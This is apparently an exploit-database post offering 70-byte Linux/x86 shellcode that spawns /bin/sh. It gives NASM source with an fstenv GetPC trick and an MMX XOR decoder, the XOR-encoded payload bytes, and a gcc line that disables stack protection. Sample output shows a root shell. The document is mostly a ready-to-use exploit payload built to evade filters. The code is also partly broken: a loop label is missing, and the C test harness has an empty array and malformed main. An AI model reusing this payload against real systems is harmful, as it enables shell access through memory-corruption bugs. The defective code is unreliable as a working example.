Linux/x86 execve /bin/sh Shellcode

70 bytes small Linux/x86 shellcode with XOR decoder stub and fstenv MMX FPU spawning a /bin/sh shell.

MD5 | e253cdb3deeb186f54711db1afcee22e

# Exploit Title: Linux/x86 execve /bin/sh (fstenv eip GetPC technique) (70 bytes, xor encoded)
# Date: 09/06/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86

shellcode with XOR decoder stub and fstenv MMX FPU
spawning a /bin/sh shell

uses the fstenv GetPC technique to get the memory address dynamically
(alternative to jmp-call-pop)

Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
Shellcode Length: 70
# id
uid=0(root) gid=0(root) groups=0(root)
# ps -p $$
24045 pts/4 00:00:00 sh

*** Created by d7x ***

; shellcode assembly

global _start

section .text
fstenv [esp-0xc]
pop edi ; put eip into edi
add edi, 37 ; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz)

lea esi, [edi + 8]
xor ecx, ecx
mov cl, 4

movq mm0, qword [edi]
movq mm1, qword [esi]
pxor mm0, mm1
movq qword [esi], mm0
add esi, 0x8
loop decode

jmp short EncodedShellcode


decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d
EncodedShellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d


#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = \

void main(void)
printf("Shellcode Length: %d\n", strlen(shellcode));

int(*ret)() = (int(*)())shellcode;



Related Posts